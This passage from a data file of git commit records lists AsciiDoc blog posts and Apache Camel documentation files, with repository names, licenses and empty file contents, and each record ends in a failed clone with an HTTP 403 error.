lane\/dannylane.github.io,ioisup\/ioisup.github.io,FilipLaz\/filiplaz.github.io,maurodx\/maurodx.github.io,bretonio\/bretonio.github.io,AppHat\/AppHat.github.io,arthurmolina\/arthurmolina.github.io,raytong82\/raytong82.github.io,mnishihan\/mnishihan.github.io,darkfirenze\/darkfirenze.github.io,jkamke\/jkamke.github.io,jaganz\/jaganz.github.io,lxjk\/lxjk.github.io,bithunshal\/shalsblog,blater\/blater.github.io,qu85101522\/qu85101522.github.io,deunz\/deunz.github.io,caseyy\/caseyy.github.io,willyb321\/willyb321.github.io,maurodx\/maurodx.github.io,fuzzy-logic\/fuzzy-logic.github.io,SBozhko\/sbozhko.github.io,hoernschen\/hoernschen.github.io,fabself\/fabself.github.io,yejodido\/hubpress.io,hayyuelha\/technical-blog,azubkov\/azubkov.github.io,Vtek\/vtek.github.io,flug\/flug.github.io,thomasgwills\/thomasgwills.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,nilsonline\/nilsonline.github.io,manikmagar\/manikmagar.github.io,alexbleasdale\/alexbleasdale.github.io,chowwin\/chowwin.github.io,FSUgenomics\/hubpress.io,dingboopt\/dingboopt.github.io,sinemaga\/sinemaga.github.io,heliomsolivas\/heliomsolivas.github.io,nanox77\/nanox77.github.io,eyalpost\/eyalpost.github.io,hermione6\/hermione6.github.io,kay\/kay.github.io,raloliver\/raloliver.github.io,blayhem\/blayhem.github.io,scholzi94\/scholzi94.github.io,Aferide\/Aferide.github.io,thrasos\/thrasos.github.io,theofilis\/theofilis.github.io,sumit1sen\/sumit1sen.github.io,TelfordLab\/telfordlab.github.io,gsera\/gsera.github.io,HiDAl\/hidal.github.io,rage5474\/rage5474.github.io,mrcouthy\/mrcouthy.github.io,TommyHernandez\/tommyhernandez.github.io,tosun-si\/tosun-si.github.io,mmhchan\/mmhchan.github.io,devananda\/devananda.github.io,unay-cilamega\/unay-cilamega.github.io,mattburnin\/hubpress.io,livehua\/livehua.github.io,alexbleasdale\/alexbleasdale.github.io,stratdi\/stratdi.github.io,itsallanillusion\/itsallanillusion.github.io,reversergeek\/reversergeek.github.io,tosun-si\/tosun-si.github.io,cringler\/cringler.github.io,wols\/time,hhimanshu\/hhimanshu.github.io,christiannolte\/hubpress.io,neomobil\/neomobil.github.io,markfetherolf\/markfetherolf.github.io,deformat\/deformat.github.io,heberqc\/heberqc.github.io,jmelfi\/jmelfi.github.io,crimarde\/crimarde.github.io,pallewela\/pallewela.github.io,geektic\/geektic.github.io,niole\/niole.github.io,TinkeringAlways\/tinkeringalways.github.io,ntfnd\/ntfnd.github.io,gorjason\/gorjason.github.io,hitamutable\/hitamutable.github.io,richard-popham\/richard-popham.github.io,JithinPavithran\/JithinPavithran.github.io,yuyudhan\/yuyudhan.github.io,murilo140891\/murilo140891.github.io,livehua\/livehua.github.io,vs4vijay\/vs4vijay.github.io,kzmenet\/kzmenet.github.io,nnn-dev\/nnn-dev.github.io,IdoramNaed\/idoramnaed.github.io,ahopkins\/amhopkins.com,psicrest\/psicrest.github.io,thykka\/thykka.github.io,debbiezhu\/debbiezhu.github.io,iesextremadura\/iesextremadura.github.io,zestyroxy\/zestyroxy.github.io,sonyl\/sonyl.github.io,blahcadepodcast\/blahcadepodcast.github.io,introspectively\/introspectively.github.io,jaganz\/jaganz.github.io,costalfy\/costalfy.github.io,blogforfun\/blogforfun.github.io,Murazaki\/murazaki.github.io,MatanRubin\/MatanRubin.github.io,HubPress\/hubpress.io,hirako2000\/hirako2000.github.io,darsto\/darsto.github.io,zhuo2015\/zhuo2015.github.io,bencekiraly\/bencekiraly.github.io,geummo\/geummo.github.io,woehrl01\/woehrl01.hubpress.io,elidiazgt\/mind,emilio2hd\/emilio2hd.github.io,TunnyTraffic\/gh-hosting,havvazaman\/havvazaman.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,backemulus\/backemulus.github.io,itsashis4u\/hubpress.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codingkapoor\/codingkapoor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"273073d15de8e29fcfbd6567b23b4ce8a630ed7f","subject":"Update 2015-07-14-5-stundiges-Treffen-von-Studenten-mit-Imam-Khamenei.adoc","message":"Update 2015-07-14-5-stundiges-Treffen-von-Studenten-mit-Imam-Khamenei.adoc","repos":"havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io,havvazaman\/havvazaman.github.io","old_file":"_posts\/2015-07-14-5-stundiges-Treffen-von-Studenten-mit-Imam-Khamenei.adoc","new_file":"_posts\/2015-07-14-5-stundiges-Treffen-von-Studenten-mit-Imam-Khamenei.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/havvazaman\/havvazaman.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3d24cce4c64c100e399a62707eec8f691698d74","subject":"Update 2016-12-23-Fix-network-TV-streaming-Working-then-nothing-Mediaportal-extension-with-Kodi.adoc","message":"Update 2016-12-23-Fix-network-TV-streaming-Working-then-nothing-Mediaportal-extension-with-Kodi.adoc","repos":"jerometambo\/blog,jerometambo\/blog,jerometambo\/blog,jerometambo\/blog","old_file":"_posts\/2016-12-23-Fix-network-TV-streaming-Working-then-nothing-Mediaportal-extension-with-Kodi.adoc","new_file":"_posts\/2016-12-23-Fix-network-TV-streaming-Working-then-nothing-Mediaportal-extension-with-Kodi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jerometambo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc0011765620ad4deadf5e77a527baf4b6e9d60f","subject":"Added Camel 2.17.4 release notes to docs","message":"Added Camel 2.17.4 release notes to docs\n","repos":"tadayosi\/camel,objectiser\/camel,apache\/camel,kevinearls\/camel,apache\/camel,christophd\/camel,nikhilvibhav\/camel,CodeSmell\/camel,jamesnetherton\/camel,tdiesler\/camel,DariusX\/camel,zregvart\/camel,anoordover\/camel,tdiesler\/camel,sverkera\/camel,jamesnetherton\/camel,gnodet\/camel,cunningt\/camel,mcollovati\/camel,objectiser\/camel,nikhilvibhav\/camel,pax95\/camel,alvinkwekel\/camel,kevinearls\/camel,alvinkwekel\/camel,mcollovati\/camel,anoordover\/camel,Fabryprog\/camel,gnodet\/camel,DariusX\/camel,alvinkwekel\/camel,davidkarlsen\/camel,tdiesler\/camel,DariusX\/camel,Fabryprog\/camel,davidkarlsen\/camel,tadayosi\/camel,kevinearls\/camel,kevinearls\/camel,mcollovati\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,anoordover\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,sverkera\/camel,jamesnetherton\/camel,adessaigne\/camel,kevinearls\/camel,sverkera\/camel,tadayosi\/camel,apache\/camel,ullgren\/camel,onders86\/camel,gnodet\/camel,pax95\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,nicolaferraro\/camel,gnodet\/camel,pax95\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,zregvart\/camel,pmoerenhout\/camel,pmoerenhout\/camel,ullgren\/camel,sverkera\/camel,anoordover\/camel,gnodet\/camel,CodeSmell\/camel,zregvart\/camel,onders86\/camel,CodeSmell\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,davidkarlsen\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,cunningt\/camel,jamesnetherton\/camel,onders86\/camel,alvinkwekel\/camel,pax95\/camel,adessaigne\/camel,onders86\/camel,jamesnetherton\/camel,CodeSmell\/camel,nikhilvibhav\/camel,ullgren\/camel,tadayosi\/camel,apache\/camel,Fabryprog\/camel,Fabryprog\/camel,pmoerenhout\/camel,apache\/camel,sverkera\/camel,zregvart\/camel,christophd\/camel,adessaigne\/camel,davidkarlsen\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,apache\/camel,anoordover\/camel,objectiser\/camel,pax95\/camel,christophd\/camel,punkhorn\/camel-upstream,objectiser\/camel,onders86\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,ullgren\/camel,anoordover\/camel,kevinearls\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2174-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2174-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6d7f38081df7688225ed4b145b269b7309411c1","subject":"Added Camel 2.19.3 release notes to docs","message":"Added Camel 2.19.3 release notes to docs\n","repos":"CodeSmell\/camel,anoordover\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,CodeSmell\/camel,tadayosi\/camel,tadayosi\/camel,zregvart\/camel,onders86\/camel,alvinkwekel\/camel,Fabryprog\/camel,adessaigne\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,apache\/camel,sverkera\/camel,anoordover\/camel,jamesnetherton\/camel,alvinkwekel\/camel,objectiser\/camel,Fabryprog\/camel,tdiesler\/camel,tadayosi\/camel,DariusX\/camel,davidkarlsen\/camel,ullgren\/camel,kevinearls\/camel,onders86\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,gnodet\/camel,pmoerenhout\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,anoordover\/camel,CodeSmell\/camel,cunningt\/camel,onders86\/camel,pmoerenhout\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,pax95\/camel,pax95\/camel,mcollovati\/camel,jamesnetherton\/camel,DariusX\/camel,adessaigne\/camel,christophd\/camel,kevinearls\/camel,zregvart\/camel,nicolaferraro\/camel,apache\/camel,jamesnetherton\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,nikhilvibhav\/camel,DariusX\/camel,kevinearls\/camel,kevinearls\/camel,pmoerenhout\/camel,objectiser\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,jamesnetherton\/camel,cunningt\/camel,pmoerenhout\/camel,sverkera\/camel,sverkera\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,sverkera\/camel,apache\/camel,objectiser\/camel,gnodet\/camel,tdiesler\/camel,zregvart\/camel,cunningt\/camel,ullgren\/camel,ullgren\/camel,apache\/camel,nicolaferraro\/camel,sverkera\/camel,onders86\/camel,christophd\/camel,onders86\/camel,adessaigne\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,pax95\/camel,jamesnetherton\/camel,gnodet\/camel,christophd\/camel,pax95\/camel,ullgren\/camel,objectiser\/camel,nikhilvibhav\/camel,christophd\/camel,tadayosi\/camel,mcollovati\/camel,davidkarlsen\/camel,sverkera\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,Fabryprog\/camel,nicolaferraro\/camel,kevinearls\/camel,punkhorn\/camel-upstream,mcollovati\/camel,adessaigne\/camel,Fabryprog\/camel,cunningt\/camel,anoordover\/camel,cunningt\/camel,anoordover\/camel,anoordover\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2193-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2193-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cadaf3a562c907c9d3fd3e36ced6408e51a6dd5","subject":"Delete Install Guide","message":"Delete Install Guide\n","repos":"candyam5522\/eureka,jsons\/eureka,candyam5522\/eureka,candyam5522\/eureka","old_file":"docs\/eureka_install_guide.adoc","new_file":"docs\/eureka_install_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsons\/eureka.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"515245c187c78d80f19f1a087114038abe2cd0d6","subject":"Update 2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","message":"Update 2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","new_file":"_posts\/2016-10-21-Today-in-My-Brothers-in-Non-Specified-Appendant-Body-are-Driving-Me-Up-the-Wall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a851e0716defe7a82e8e200ea8761f0dc4b93833","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94dd9e88a655e1fe3b9132474a692009fdd24d5","subject":"y2b create post Razer Sabertooth Gaming Controller -- XBOX 360, PC (CES 2013)","message":"y2b create post Razer Sabertooth Gaming Controller -- XBOX 360, PC (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-09-Razer-Sabertooth-Gaming-Controller--XBOX-360-PC-CES-2013.adoc","new_file":"_posts\/2013-01-09-Razer-Sabertooth-Gaming-Controller--XBOX-360-PC-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf9cebbc33fa3c11e54d4118bcd9fd5a0058df6","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1cfa7949d9802fe00c28ebb0db05026b88b69f3","subject":"y2b create post Huawei Mate 10 Live Hands On","message":"y2b create post Huawei Mate 10 Live Hands On","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-16-Huawei-Mate-10-Live-Hands-On.adoc","new_file":"_posts\/2017-10-16-Huawei-Mate-10-Live-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb722f0d3b0ec5d7d553ef71574ecc3687937a92","subject":"Update 2015-08-07-GWC-Takes-Times-Square.adoc","message":"Update 2015-08-07-GWC-Takes-Times-Square.adoc","repos":"GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io,GWCATT\/gwcatt.github.io","old_file":"_posts\/2015-08-07-GWC-Takes-Times-Square.adoc","new_file":"_posts\/2015-08-07-GWC-Takes-Times-Square.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GWCATT\/gwcatt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0e2e78e8cbada9e2215a34baa61a1a775764848","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b92a06f825f36cca22d0004bcda94cca3e6b1fe","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9b79e68bb06b068c06c77617d29075c3ea570e","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89289737f2a15a4ee94b7659a797d41d6115f6f8","subject":"Update 2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","message":"Update 2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","new_file":"_posts\/2016-08-24-Changing-the-root-context-for-apimans-gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0825ad2ce567f043a0d11c0b26d4e9a08dc26bc","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be93848b296556e38922e395faa194369c2feb96","subject":"y2b create post Austin Evans loses everything - We respond.","message":"y2b create post Austin Evans loses everything - We respond.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-10-Austin-Evans-loses-everything--We-respond.adoc","new_file":"_posts\/2014-02-10-Austin-Evans-loses-everything--We-respond.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf1d0085bceae150eb3c952b523844b0a01d96e","subject":"Update 2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","message":"Update 2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","new_file":"_posts\/2011-08-06-1653-La-cryptographie-a-cle-publique-par-ses-inventeurs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6884bae49fe608dc7a21d6f91504329eaeef0645","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb4cba6e9192c101bdfa02866869b1adcc8a46a","subject":"Update 2014-08-21-Design-considerations.adoc","message":"Update 2014-08-21-Design-considerations.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-08-21-Design-considerations.adoc","new_file":"_posts\/2014-08-21-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803fbeed559cc40da456e93909f1700676cfbda8","subject":"Update 2015-05-11-Le-breizhcamp-a-5-ans.adoc","message":"Update 2015-05-11-Le-breizhcamp-a-5-ans.adoc","repos":"srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io,srevereault\/srevereault.github.io","old_file":"_posts\/2015-05-11-Le-breizhcamp-a-5-ans.adoc","new_file":"_posts\/2015-05-11-Le-breizhcamp-a-5-ans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/srevereault\/srevereault.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7448e07dda0547ef8d38365b4688f1b3966cf39a","subject":"Update 2015-06-05-First-week-on-the-job.adoc","message":"Update 2015-06-05-First-week-on-the-job.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-06-05-First-week-on-the-job.adoc","new_file":"_posts\/2015-06-05-First-week-on-the-job.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba5bee04f9d98a8044cacfbed04a687e1b035fae","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fe25ce0f6bcdc5d784c810d5840cc6d17d4ece5","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5013034217da21f6545ec65cd5562a661bddc878","subject":"Fixes #555, add testing guide","message":"Fixes #555, add testing guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/getting-started-testing.adoc","new_file":"docs\/src\/main\/asciidoc\/getting-started-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"137e693ec76f7dafeb519837bb678d69ce55b3fd","subject":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93ba800c3b0d04e252034d0eed250dd0363c12c3","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb23833faf861eecff68eb5c4d9aa137f6b1e601","subject":"Added Xpath language docs to Gitbook","message":"Added Xpath language docs to Gitbook\n","repos":"gnodet\/camel,gilfernandes\/camel,anoordover\/camel,lburgazzoli\/camel,rmarting\/camel,apache\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,tdiesler\/camel,RohanHart\/camel,NickCis\/camel,tkopczynski\/camel,jkorab\/camel,gnodet\/camel,nboukhed\/camel,neoramon\/camel,tkopczynski\/camel,tkopczynski\/camel,kevinearls\/camel,chirino\/camel,yuruki\/camel,davidkarlsen\/camel,chirino\/camel,allancth\/camel,acartapanis\/camel,jarst\/camel,kevinearls\/camel,hqstevenson\/camel,sirlatrom\/camel,tlehoux\/camel,jonmcewen\/camel,gautric\/camel,w4tson\/camel,onders86\/camel,RohanHart\/camel,sirlatrom\/camel,w4tson\/camel,adessaigne\/camel,nikhilvibhav\/camel,drsquidop\/camel,objectiser\/camel,mgyongyosi\/camel,sverkera\/camel,CodeSmell\/camel,acartapanis\/camel,isavin\/camel,jonmcewen\/camel,acartapanis\/camel,prashant2402\/camel,NickCis\/camel,onders86\/camel,neoramon\/camel,tdiesler\/camel,sabre1041\/camel,pkletsko\/camel,isavin\/camel,onders86\/camel,tdiesler\/camel,dmvolod\/camel,isavin\/camel,neoramon\/camel,kevinearls\/camel,hqstevenson\/camel,pax95\/camel,acartapanis\/camel,drsquidop\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,gilfernandes\/camel,apache\/camel,pax95\/camel,pmoerenhout\/camel,Thopap\/camel,curso007\/camel,bgaudaen\/camel,jamesnetherton\/camel,curso007\/camel,driseley\/camel,apache\/camel,christophd\/camel,akhettar\/camel,yuruki\/camel,acartapanis\/camel,tlehoux\/camel,bhaveshdt\/camel,Fabryprog\/camel,pmoerenhout\/